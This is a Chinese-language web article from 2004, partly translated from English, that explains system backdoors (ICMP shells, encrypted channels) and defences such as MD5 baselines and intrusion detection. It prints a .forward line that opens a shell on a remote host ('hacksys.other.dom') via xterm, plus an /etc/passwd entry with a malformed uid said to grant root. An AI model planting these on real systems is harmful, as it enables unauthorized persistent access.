系统后门的真面目<二> -pc6资讯

您的位置：首页 → 网络冲浪 → 黑客天空 → 系统后门的真面目<二>

系统后门的真面目<二> 时间：2004/10/8 16:40:00来源：本站整理作者：蓝点我要评论(1): 　　　　CMP Shell 后门

　　Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.

　　加密连接
　
　　管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.

　　Windows NT

　　由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows N T 上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序 . 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此处该如何翻译?

　　:( 解决当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀 .

　　评估

　　首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.

　　MD5基准线

　　一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

　　入侵检测

　　随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.

　　从CD-ROM启动

　　一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

　　警告由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )

　　you may want to add:

　　forward Backdoor
　　On Unix machines, placing commands into the .forward file was also

　　a common method of regaining access. For the account ``username
　　a .forward file might be constructed as follows:
　　\username
　　|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

　　permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor
preprocessing).

　　PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).

$#@62; Using smrsh can effectively negate this backdoor (although its quite
$#@62; possibly still a problem if you allow things like elms filter or
$#@62; procmail which can run programs themselves...).

　　你也许要增加:

　　.forward后门

　　Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:

　　\username
　　|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

　　这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题
......)

　　( 此段的内容理解不深, 故付上英文, 请指教! )

　　你也许能用这个"特性"做后门:

　　当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利.

　　例子:
　　rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.

文章评论

查看所有1条评论>>

热门文章 黑客大战直播网址黑客